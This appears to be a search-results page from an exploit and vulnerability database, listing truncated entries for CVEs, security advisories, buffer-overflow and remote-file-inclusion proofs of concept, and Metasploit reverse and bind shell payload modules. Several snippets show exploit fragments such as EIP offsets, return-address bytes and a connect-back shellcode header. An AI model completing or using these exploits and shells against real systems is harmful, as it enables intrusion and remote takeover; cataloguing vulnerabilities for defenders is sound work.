3096 matches found
php: exif_read_data crash on corrupted JPEG files
The exif_read_data function in the Exif module in PHP before 5.2.10 allows remote attackers to cause a denial of service (crash) via a malformed JPEG image with invalid offset fields, a different issue than CVE-2005-3353...
Mini-Stream Buffer Overflow
!/usr/bin/python ...:| Code Fix/Patch for WinXP - English |:... Referenced: http://www.exploit-db.com/exploits/10745 - mrme and fixed the offset as well as tested the exploit against WinXP SP2 and SP3 Exploit against Mini-Stream 3.0.1.1 WinXP English 12.27.2009 Author: Ron Henry -...
Mini-Stream Exploit for Windows XP SP2 and SP3
Exploit for unknown platform in category local exploits ============================================== Mini-Stream Exploit for Windows XP SP2 and SP3 ============================================== Title: Mini-Stream Exploit for Windows XP SP2 and SP3 CVE-ID: OSVDB-ID: Author: Ron Henry Published:...
Mini-stream Ripper (Windows XP SP2SP3) - Local Overflow
Mini-stream Ripper Windows XP SP2SP3 - Local Overflow !/usr/bin/python ...:| Code Fix/Patch for WinXP - English |:... Referenced: http://www.exploit-db.com/exploits/10745 - mrme and fixed the offset as well as tested the exploit against WinXP SP2 and SP3 Exploit against Mini-Stream 3.0.1.1 WinXP...
Easy RM to MP3 2.7.3.700 - Local Buffer Overflow
!/usr/bin/python Exploit for against Easy RM to MP3 2.7.3.700 12.2.2009 Author: Ron Henry - [email protected] - dijital1 Version: Easy RM to MP3 2.7.3.700 Tested against WinXP SP3 - English outputfile = "astley.m3u" shellcode="A" 26071 Offset to EIP - Windows XP SP3 shellcode+="\x25\x96\xa0\x7c"...
Microsoft Excel Shared Feature Header Pointer Offset Memory Corruption Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Office Excel. User interaction is required to exploit this vulnerability in that the target must open a malicious spreadsheet. The specific flaw exists in the handling of Shared Feature...
Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow PoC
No description provided by source. / Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC By fl0 fl0w "can't stop me/my time is now/your time is up/MY TIME IS NOW !!!!" / The EIP offset is at 312 bytes 0x138 HEX After you compile and create the .MOR file ,edit it with HEX EDITOR and...
Mozilla Firefox 2.0.0.16 UTF-8 URL Remote Buffer Overflow Exploit
No description provided by source. !/usr/bin/python FireFox 2.0.0.16 Windows XP SP3 x86 Remote Exploit Author: Dominic Chell [email protected] Exploits the UTF-8 URL overflow vulnerability described in CVE-2008-0016. As of September 2009 there are no public exploits for this vulnerability...
Portable E.M Magic Morph 1.95b Buffer Overflow
/ Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC By fl0 fl0w "can't stop me/my time is now/your time is up/MY TIME IS NOW !!!!" / The EIP offset is at 312 bytes 0x138 HEX After you compile and create the .MOR file ,edit it with HEX EDITOR and start counting from the start of t...
Portable E.M Magic Morph 1.95b - .MOR File Stack Buffer Overflow
Portable E.M Magic Morph 1.95b - .MOR File Stack Buffer Overflow / Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC By fl0 fl0w "can't stop me/my time is now/your time is up/MY TIME IS NOW !!!!" / The EIP offset is at 312 bytes 0x138 HEX After you compile and create the .MOR fil...
Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow PoC
Exploit for unknown platform in category local exploits ================================================================== Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow PoC ================================================================== / Portable E.M Magic Morph 1.95b .MOR Fi...
Windows x64 Command Shell, Reverse TCP Inline
Connect back to attacker and spawn a command shell Windows x64 This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 460 include Msf::Payload::Windows include Msf::Payload::Single includ...
ProjectButler 1.5.0 Remote File Inclusion
projectbutler - 1.5.0 offset RFI Vulnerability Author: cr4wl3r Contact: cr4wl3r4tlinuxmaildotorg Download: http://sourceforge.net/projects/projectbutler/files/projectbutler/1.5.0/ProjectButler.tar.gz Vuln : require_once $offset."class.project.inc"; PoC :...
ProjectButler 1.5.0 (pda_projects.php offset) RFI Vulnerability
Exploit for unknown platform in category web applications =============================================================== ProjectButler 1.5.0 (pda_projects.php offset) RFI Vulnerability =============================================================== projectbutler - 1.5.0 offset RFI Vulnerability...
Millenium MP3 Studio 1.0 .mpf File Local Stack Overflow Exploit #2
Exploit for unknown platform in category local exploits ================================================================== Millenium MP3 Studio 1.0 .mpf File Local Stack Overflow Exploit 2 ================================================================== + Vulnerability : .mpf File Local Stack...
Mandriva Linux Security Advisory : pidgin (MDVSA-2009:147)
Security vulnerabilities have been identified and fixed in pidgin : Buffer overflow in the XMPP SOCKS5 bytestream server in Pidgin (formerly Gaim) before 2.5.6 allows remote authenticated users to execute arbitrary code via vectors involving an outbound XMPP file transfer. NOTE: some of these detail...
Foxit Reader JPEG2000 / JBIG Decoder Add-On < 2.0.2009.616 Multiple Vulnerabilities
The Foxit Reader application installed on the remote Windows host includes an optional JPEG2000 / JBIG Decoder add-on that is prior to version 2.0.2009.616. It is, therefore, affected by multiple vulnerabilities : - An out-of-bounds read error exists in the add-on due to improper handling of a...
OS X (vfork) Command Shell, Bind TCP Inline
Listen for a connection, vfork if necessary, and spawn a command shell This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 152 include Msf::Payload::Single include Msf::Payload::Osx...
Linux/x86 - connect-back "11.22.33.44",31337/tcp - 90 bytes
No description provided by source. /--------------------------------------------------------------------------- 90 byte Connect Back shellcode by Russell Sanford - [email protected] --------------------------------------------------------------------------- filename: x86-linux-connect-back.c info:...
CVE-2008-6189
SQL injection vulnerability in GForge 4.5.19 allows remote attackers to execute arbitrary SQL commands via the offset parameter to (1) new/index.php, (2) news/index.php, and (3) top/topusers.php, which is not properly handled in database-pgsql.php...